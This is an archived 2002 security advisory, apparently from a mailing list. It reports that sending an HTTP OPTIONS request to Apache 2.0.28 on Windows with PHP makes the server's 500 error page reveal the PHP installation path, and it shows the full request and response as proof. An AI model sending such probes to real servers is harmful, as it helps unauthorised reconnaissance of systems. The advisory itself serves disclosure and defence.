Title : PHP Reveals True Path (OPTIONS) Author : Paul Brereton E-Mail : brereton_paulat_private Summary : When a web administrator installs Apache with PHP and adds index.php to the Apache configuration file, Apache first looks for index.php when sending back the default web page for this directory. This opens up a security weakness that allows remote attackers to gain sensitive information about the directory structure of the Apache and PHP installation. Details :Sending an OPTIONS request to the web server reveals the installation path of PHP. Example: The OPTIONS output is show here: > OPTIONS / HTTP/1.1 > Host: 192.168.1.2 > Accept: */* < HTTP/1.1 500 Internal Server Error < Date: Sun, 03 Feb 2002 10:56:53 GMT < Server: Apache/2.0.28 (Win32) < Vary: accept-language < Accept-Ranges: bytes < Content-Length: 680 < Connection: close < Content-Type: text/html; charset=ISO-8859-1 < <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> < <HTML> < <HEAD> < <TITLE>Server error!</TITLE> < <LINK REV="made" HREF="mailto:adminat_private"> < </HEAD> < < <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000CC"> < <H1>Server error!</H1> < <DL> < <DD> < < < < handler "cgi-script" not found for: C:/php/php.exe < < < </DL><DL><DD> <If you think this is a server error, please contact <the <A HREF="mailto:adminat_private">Webmaster</A> < < </DL> < < <H2>Error 500</H2> < <DL> < <DD> < <ADDRESS> < <A HREF="/">192.168.1.2</A> < <BR> < < <small>02/03/02 10:56:53</small> < <BR> < <small>Apache/2.0.28 (Win32)</small> < </ADDRESS> < </DL> < </BODY> < </HTML> < As you can see the line " handler "cgi-script" not found for: C:/php/php.exe " reveals the install path of PHP.
This archive was generated by hypermail 2b30 : Thu Feb 07 2002 - 13:50:12 PST